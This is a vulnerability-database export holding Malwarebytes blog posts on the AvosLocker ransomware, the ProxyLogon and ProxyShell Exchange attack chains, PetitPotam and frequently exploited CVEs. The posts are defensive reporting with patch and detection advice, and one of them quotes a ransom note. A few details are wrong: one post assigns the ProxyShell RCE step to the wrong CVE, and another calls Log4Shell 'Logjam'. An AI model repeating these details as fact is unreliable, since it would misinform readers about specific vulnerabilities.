state-sponsored threat actor Lazarus Group exploiting Chrome Zero-day vulnerability LAPSUS$ \u2013 New extortion group involved in the breach against Nvidia, Microsoft, Okta and Samsung DarkHotel APT group targeting the Hospitality Industry in China New Threat Actor using Serpent Backdoor attacking French Entities Muhstik botnet adds another vulnerability exploit to its arsenal", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T13:56:10", "type": "hivepro", "title": "Weekly Threat Digest: 21 \u2013 27 March 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34484", "CVE-2021-34523", "CVE-2022-0543", "CVE-2022-0609", "CVE-2022-1096", "CVE-2022-21919"], "modified": "2022-03-29T13:56:10", "id": "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "href": "https://www.hivepro.com/weekly-threat-digest-21-27-march-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2022-03-21T21:27:45", "description": "The FBI has issued an[ advisory](<https://www.ic3.gov/Media/News/2022/220318.pdf>) about the AvosLocker ransomware. Notably the FBI has noticed that several victims have reported Microsoft Exchange Server vulnerabilities as the intrusion vector. \n\nAvosLocker is a Ransomware as a Service (RaaS) affiliate-based group that has targeted victims across multiple critical infrastructure sectors in the United States including financial services, critical manufacturing, and government facilities.\n\n## Threat profile\n\nAvosLocker ransomware is a multi-threaded Windows executable written in C++ that runs as a console application and shows a log of actions performed on victim systems. AvosLocker ransomware encrypts files on a victim\u2019s server and renames them with the \u201c.avos\u201d extension.\n\nThe AvosLocker executable leaves a ransom note called GET_YOUR_FILES_BACK.txt in all directories where encryption occurs. The ransom note includes a .onion site that contains instructions for paying the ransom and receiving a decryption key.\n\n\n\n> _Attention!_\n> \n> _Your systems have been encrypted, and your confidential documents were downloaded._\n> \n> _In order to restore your data, you must pay for the decryption key & application._\n> \n> _You may do so by visiting us at <onion address>._\n> \n> _This is an onion address that you may access using Tor Browser which you may download at <https://www.torproject.org/download/>_\n> \n> _Details such as pricing, how long before the price increases and such will be available to you once you enter your ID presented to you below in this note in our website._\n> \n> _Contact us soon, because those who don\u2019t have their data leaked in our press release blog and the price they\u2019ll have to pay will go up significantly._\n> \n> _The corporations whom don\u2019t pay or fail to respond in a swift manner have their data leaked in our blog, accessible at <onion address>_\n\nSo, besides encrypting your files, AvosLocker also exfiltrates data and threatens to publish the stolen data to its leaks site. The public leak site not only lists victims of AvosLocker, along with a sample of data allegedly stolen from the victim\u2019s network, but also gives visitors an opportunity to view a sample of victim data and to purchase that data.\n\nThe FBI also notes that in some cases, AvosLocker victims receive phone calls from an AvosLocker representative. The caller encourages the victim to go to the .onion site to negotiate, and threatens to post stolen data online. In some cases, AvosLocker actors will threaten and execute distributed denial-of-service (DDoS) attacks during negotiations.\n\n## Exchange vulnerabilities\n\nSince AvosLocker is a Ransomware-as-a-Service it may depend on the affiliate which of the vulnerabilities gets used.\n\nThe Exchange Server vulnerabilities are named as: CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473, and CVE-2021-26855.\n\n[CVE-2021-31207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31207>): a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process. This is the way in.\n\n[CVE-2021-34523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523>): a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions. This is how they take control.\n\n[CVE-2021-34473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>): a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files. This allows the attacker to drop malware on the server and run it.\n\nThis is exactly the same attack chain we [described](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>) in August 2021. This chain of attack was generally referred to as ProxyShell.\n\nAnother RCE vulnerability in Exchange Server has been seen as well:\n\n[CVE-2021-26855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855>): the ProxyLogon vulnerability which we discussed in detail in our article on [Microsoft Exchange attacks causing panic as criminals go shell collecting](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>). The vulnerability allows an attacker to drop a webshell on a vulnerable Exchange Server. A web shell is a script used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Obviously, not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)\n\n## Mitigation\n\nAs we stated earlier, all these vulnerabilities have been patched. So, if you are wondering which updates to install next and you are running one or more Microsoft Exchange Server instances, starting there might be a good idea.\n\nMicrosoft\u2019s team has published a [script on GitHub](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) that can check the status of protection against ProxyLogon vulnerabilities of Exchange servers.\n\n## Detection\n\nMalwarebytes detects AvosLocker as [Ransom.AvosLocker](<https://blog.malwarebytes.com/detections/ransom-avoslocker/>).\n\n_Malwarebytes blocks Ransom.AvosLocker_\n\nStay safe, everyone!\n\nThe post [AvosLocker ransomware uses Microsoft Exchange Server vulnerabilities, says FBI](<https://blog.malwarebytes.com/ransomware/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-21T21:09:12", "type": "malwarebytes", "title": "AvosLocker ransomware uses Microsoft Exchange Server vulnerabilities, says FBI", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-21T21:09:12", "id": "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "href": "https://blog.malwarebytes.com/ransomware/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-16T10:27:50", "description": "Microsoft has detected multiple [zero-day](<https://blog.malwarebytes.com/glossary/zero-day/>) exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. Microsoft attributes the attacks to a group they have dubbed Hafnium.\n\n> \u201cHAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.\u201d\n\n### The Hafnium attack group\n\nBesides a rare metal that chemically resembles zirconium, Hafnium is a newly identified attack group that is also thought to be responsible for other attacks on internet-facing servers, and typically exfiltrates data to [file sharing sites](<https://blog.malwarebytes.com/how-tos-2/2020/12/file-sharing-and-cloud-storage-sites-how-safe-are-they/>). Despite their use of leased servers in the US, the group is believed to be based in China (as most security researchers will tell you, attribution is hard, especially when it involves international espionage).\n\n### Exchange Server\n\nIn many organizations, internal cooperation depends on groupware solutions that enable the central administration of emails, calendars, contacts, and tasks. Microsoft Exchange Server is software that offers this functionality for Windows-based server systems.\n\nIn this case the attacker was using one of the zero-day vulnerabilities to steal the full contents of several user mailboxes from such servers.\n\n### Not one, but four zero-days\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The CVE\u2019s (with descriptions provided by Microsoft) used in these attacks were:\n\n * [**CVE-2021-26855**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n * [**CVE-2021-26857**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n * [**CVE-2021-26858**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n * [**CVE-2021-27065**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n\nThey all look the same. Boring you said? Read on!\n\n### The attack chain\n\nWhile the CVE description is the same for the 4 CVE\u2019s we can learn from the report by the security firm that discovered the attacks, Volexity, that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to steal mailbox content. The Remote Code Execution (RCE) vulnerability CVE-2021-26857 was used to run code under the System account. The other two zero-day flaws \u2014 CVE-2021-26858 and CVE-2021-27065 \u2014 would allow an attacker to write a file to any part of the server.\n\nTogether these 4 vulnerabilities form a powerful attack chain which only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, Hafnium operators deployed web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\n### Urgent patching necessary\n\nEven though the use of the vulnerabilities was described as \u201climited\u201d, now that the information has been made public, we may see a quick rise in the number of attacks. Especially since the attack does not require a lot of information about the victim to start with.\n\nOr as Microsoft\u2019s vice president for customer security Tom Burt put it:\n\n> \u201cEven though we\u2019ve worked quickly to deploy an update for the Hafnium exploits, we know that many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems.\u201d\n\nUsers of Microsoft Exchange Server 2013, Microsoft Exchange Server 2016, and Microsoft Exchange Server 2019 are advised to apply the updates immediately to protect against these exploits, prioritizing the externally facing Exchange servers.\n\nMicrosoft also advises that the initial stage of the attack can be stopped by "restricting untrusted connections, or by setting up a VPN to separate the Exchange server from external access", although the other parts of the attack chain can still be exploited, if other means of access are used.\n\n### Update March 4, 2021\n\nThe Cybersecurity and Infrastructure Security Agency issued an [emergency directive](<https://cyber.dhs.gov/ed/21-02/>) after CISA partners observed active exploitation of vulnerabilities in Microsoft Exchange _on-premises_ products. The directive gives detailed instructions for agencies to follow immediately after identifying all instances of on-premises Microsoft Exchange Servers in their environment.\n\nFor readers that are interested in the more technical details of the attack chain, [Veloxity published a blog](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) that provides details about their investigation, the vulnerabilities, and which also includes IOCs.\n\n### Update March 5, 2021\n\nIt turns out that [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) was discovered in December of 2020 by DEVCORE who named the vulnerability ProxyLogon. They called it [ProxyLogon](<https://proxylogon.com/>) because this bug exploits against the Exchange **Proxy** Architecture and **Logon** mechanism. After DEVCORE chained the bugs together to a workable pre-auth RCE exploit, they sent an advisory and exploit to Microsoft through the MSRC portal. The entire timeline can be found [here](<https://proxylogon.com/#timeline>).\n\n### Update March 8, 2021\n\nMicrosoft has released an [updated script that scans Exchange log files](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) for indicators of compromise (IOCs) associated with the vulnerabilities disclosed on March 2, 2021. The US Cybersecurity & Infrastructure Security Agency (CISA) has [issued a warning](<https://us-cert.cisa.gov/ncas/current-activity/2021/03/06/microsoft-ioc-detection-tool-exchange-server-vulnerabilities>) that it is aware of widespread domestic and international exploitation of these vulnerabilities and strongly recommends organizations run the script as soon as possible.\n\nMicrosoft has also added definitions to its standalone malware scanner, the [Microsoft Safety Scanner](<https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download>) (also known as the Microsoft Support Emergency Response Tool or MSERT), so that it detects web shells.\n\nMalwarebytes detects web shells planted on comprised Exchange servers as [Backdoor.Hafnium](<https://blog.malwarebytes.com/detections/backdoor-hafnium/>). You can read more about the use of web shells in Exchange server attacks in our article [Microsoft Exchange attacks cause panic as criminals go shell collecting](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>).\n\n### Update March 12, 2021\n\nThe abuse of these vulnerabilities has sky-rocketed, and the first public proof-of-concept (PoC) exploit for the ProxyLogon flaws has appeared on GitHub, only to be taken down by the site. In spite of Microsoft's efforts, cybercriminals have shown in numbers that they are exploiting this opportunity to the fullest.\n\nA new form of ransomware has also entered the mix. Detections for DearCry, a new form of human-operated ransomware that's deployed through compromised Exchange servers, began yesterday. When the ransomware was still unknown, it would have been detected by Malwarebytes proactively, as Malware.Ransom.Agent.Generic. \n\nYou can read more about DearCry ransomware attacks in our article [Ransomware is targeting vulnerable Microsoft Exchange servers](<https://blog.malwarebytes.com/ransomware/2021/03/ransomware-is-targeting-vulnerable-microsoft-exchange-servers/>).\n\n### Update March 16, 2021\n\nMicrosoft has released a new, one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool will help customers who do not have dedicated security or IT teams to apply these security updates. This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\n\nDetails, a [download link](<https://aka.ms/eomt>), user instructions, and more information can be found in the [Microsoft Security Response Center](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>). \n\nWe will keep you posted as we gather more information about these ransomware attacks.\n\nStay safe, everyone!\n\nThe post [Patch now! Exchange servers attacked by Hafnium zero-days](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-03T12:34:27", "type": "malwarebytes", "title": "Patch now! Exchange servers attacked by Hafnium zero-days", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T12:34:27", "id": "MALWAREBYTES:B4D157FAC0EB655355514D120382CC56", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-23T18:35:00", "description": "Last Saturday the Cybersecurity and Infrastructure Security Agency issued an [urgent warning](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>) that threat actors are actively exploiting three Microsoft Exchange vulnerabilities\u2014[CVE-2021-34473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>), [CVE-2021-34523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523>), and [CVE-2021-31207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31207>). These vulnerabilities can be chained together to remotely execute arbitrary code on a vulnerable machine.\n\nThis set of Exchange vulnerabilities is often grouped under the name ProxyShell. Fixes were available in the [May 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-May>) issued by Microsoft. (To be more precise, the first two were patched in April and CVE-2021-31207 was patched in May.)\n\n### The attack chain\n\nSimply explained, these three vulnerabilities can be chained together to allow a remote attacker to run code on the unpatched server. Attackers use them as follows:\n\n * **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.\n * **Take control **with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.\n * **Do bad things** with CVE-2021-34523, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.\n\n### ProxyShell\n\nThe Record reports that ProxyShell has been used to [take over some 2,000 Microsoft Exchange mail servers](<https://therecord.media/almost-2000-exchange-servers-hacked-using-proxyshell-exploit/>) in just two days. This can only happen where organisations use the on-premise version of Exchange, and system administrators haven't installed the April and May patches.\n\nWe know there are many reasons why patching is difficult, and often slow. The high number is surprising though, given the noise level about Microsoft Exchange vulnerabilities has been high since [March](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>). Although it may have been muffled by the other alarm cries about PrintNightmare, HiveNightmare, PetitPotam, and many others.\n\n### Ransomware\n\nSeveral researchers have pointed to a ransomware group named LockFile that combines ProxyShell with [PetitPotam](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/microsoft-provides-more-mitigation-instructions-for-the-petitpotam-attack/>). [Kevin Beaumont](<https://twitter.com/GossiTheDog>) has documented how his Exchange honeypot detected exploitation by ProxyShell to drop a [webshell](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>). Later, the threat actor revisited to initiate the staging of artefacts related to the LockFile ransomware. For those interested in how to identify whether their servers are vulnerable, and technical details about the stages in this attack, we highly recommend you read [Kevin Beaumont\u2019s post](<https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c>).\n\n### PetitPotam\n\nBefore we can point out how ProxyShell can lead to a full blown network-wide ransomware infection we ought to tell you more about PetiPotam. PetitPotam enables a threat actor to launch an NTLM relay attack on domain controllers.\n\nPetitPotam uses the `EfsRpcOpenFileRaw` function of the Microsoft Encrypting File System Remote Protocol (MS-EFSRPC) API. MS-EFSRPC is used for maintenance and management operations on encrypted data that is stored remotely, and accessible over a network. The PetitPotam proof-of-concept (PoC) takes the form of a manipulator-in-the-middle (MitM) attack against Microsoft\u2019s NTLM authentication system. The targeted computer is forced to initiate an authentication procedure and share its authentication details via NTLM.\n\nSince the PetitPotam attack is not based on a vulnerability but uses a legitimate function in a way that was not intended, it will be hard to patch for this attack without \u201cbreaking stuff.\u201d Further, stopping the Encrypting File System (EFS) service does not prevent the technique from being exploited. (For mitigation details, see our post about [PetitPotam](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/microsoft-provides-more-mitigation-instructions-for-the-petitpotam-attack/>).)\n\n### LockFile\n\nLockFile attacks have been recorded mostly in the US and Asia, focusing on organizations in financial services, manufacturing, engineering, legal, business services, travel, and tourism. Symantec pointed out in a [blog post](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows>) that the ransom note from LockFile ransomware is very similar to the one used by the [LockBit](<http://blog.malwarebytes.com/detections/ransom-lockbit/>) ransomware group and that they reference the Conti gang in their email address. This may mean that members of those gangs have started a new operation, or just be another indication of how all these gangs are [connected, and sharing resources and tactics](<https://blog.malwarebytes.com/ransomware/2021/04/how-ransomware-gangs-are-connected-and-sharing-resources-and-tactics/>).\n\n### Advice\n\nCISA strongly urges organizations to identify vulnerable systems on their networks and immediately apply Microsoft's Security Update from May 2021\u2014which remediates all three ProxyShell vulnerabilities\u2014to protect against these attacks.\n\nWe would like to add that you have a look at the mitigation advice for PetitPotam and prioritize tackling these problems in your updating processes.\n\nStay safe, everyone!\n\nThe post [Patch now! Microsoft Exchange is being attacked via ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-23T13:21:08", "type": "malwarebytes", "title": "Patch now! Microsoft Exchange is being attacked via ProxyShell", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-23T13:21:08", "id": "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-29T18:23:40", "description": "A joint Cybersecurity Advisory, coauthored by cybersecurity authorities of the United States (CISA, NSA, and FBI), Australia (ACSC), Canada (CCCS), New Zealand (NZ NCSC), and the United Kingdom (NCSC-UK) has detailed the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that made it into the top 10.\n\n## 1\\. Log4Shell\n\n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), commonly referred to as [Log4Shell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/>) or Logjam. This was a software flaw in the Apache Log4j logging utility. A logger is a piece of software that logs every event that happens in a computer system. The records it produces are useful for IT and security folks to trace errors or check any abnormal behavior within a system.\n\nWhen Log4Shell emerged in December 2021, what caught many by surprise was the enormous number of applications and web services, including those offered by Twitter, Apple, Google, Amazon, Steam, and Microsoft, among others, that were relying on Log4j, many of which inherited the vulnerability.\n\nThis made for an exceptionally broad attack surface. Combine that with an incredibly easy to use exploit and there should be no surprise that this vulnerability made it to the top of the list.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has launched an open source scanner to find applications that are vulnerable to the Log4j vulnerabilities listed as CVE-2021-44228 and CVE-2021-45046. The [CISA Log4j scanner](<https://github.com/cisagov/log4j-scanner>) is based on other open source tools and supports scanning lists of URLs, several fuzzing options, DNS callback, and payloads to circumvent web-application firewalls.\n\n## 2\\. CVE-2021-40539\n\n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) is a REST API authentication bypass [vulnerability in ManageEngine\u2019s single sign-on (SSO) solution](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) with resultant remote code execution (RCE) that exists in Zoho ManageEngine ADSelfService Plus version 6113 and prior. When word of this vulnerability came out it was already clear that it was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. Other researchers chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat actor. It was clear from the start that [APT](<https://blog.malwarebytes.com/glossary/advanced-persistent-threat-apt/>) threat-actors were likely among those exploiting the vulnerability.\n\nThe vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This allows attackers to carry out subsequent attacks resulting in RCE.\n\nFor those that have never heard of this software, it\u2019s a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps. Which means that any attacker that is able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network. A patch for this vulnerability was made available on September 7, 2021. Users were advised to update to ADSelfService Plus build 6114. The FBI, CISA, and CGCYBER also strongly urged organizations to make sure that ADSelfService Plus was not directly accessible from the Internet.\n\nThe [ManageEngine site](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) has specific instructions on how to identify and update vulnerable installations.\n\n## 3\\. ProxyShell\n\nThird on the list are 3 vulnerabilities that we commonly grouped together and referred to as [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>). [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>), [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>), and [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>).\n\nThe danger lies in the fact that these three vulnerabilities can be chained together to allow a remote attacker to run code on an unpatched Microsoft Exchange server. Attackers use them as follows:\n\n * **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.\n * **Take control **with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.\n * **Do bad things** with CVE-2021-34473, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.\n\nThe vulnerabilities were found in Microsoft Exchange Server, which has a large userbase and which is usually set up as an Internet-facing instance. Plus, many publications have provided proof-of-concept (PoC) methodologies which anyone can copy and use.\n\nMicrosoft\u2019s Security Update from May 2021 remediates all three ProxyShell vulnerabilities.\n\n## 4\\. ProxyLogon\n\nAfter the ProxyShell entries we go straight to four vulnerabilities that are grouped under a similar name\u2014[ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>)\u2014for similar reasons. [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-2685](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) all share the same description\u2014"This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443."\n\nWhile the CVE description is the same for the 4 CVE\u2019s we have learned that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to steal mailbox content. The RCE vulnerability CVE-2021-26857 was used to run code under the System account. The other two zero-day flaws\u2014CVE-2021-26858 and CVE-2021-27065\u2014would allow an attacker to write a file to any part of the server.\n\nTogether these four vulnerabilities form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, threat actors deployed web shells on the compromised servers to gain persistence and make more changes. Web shells can allow 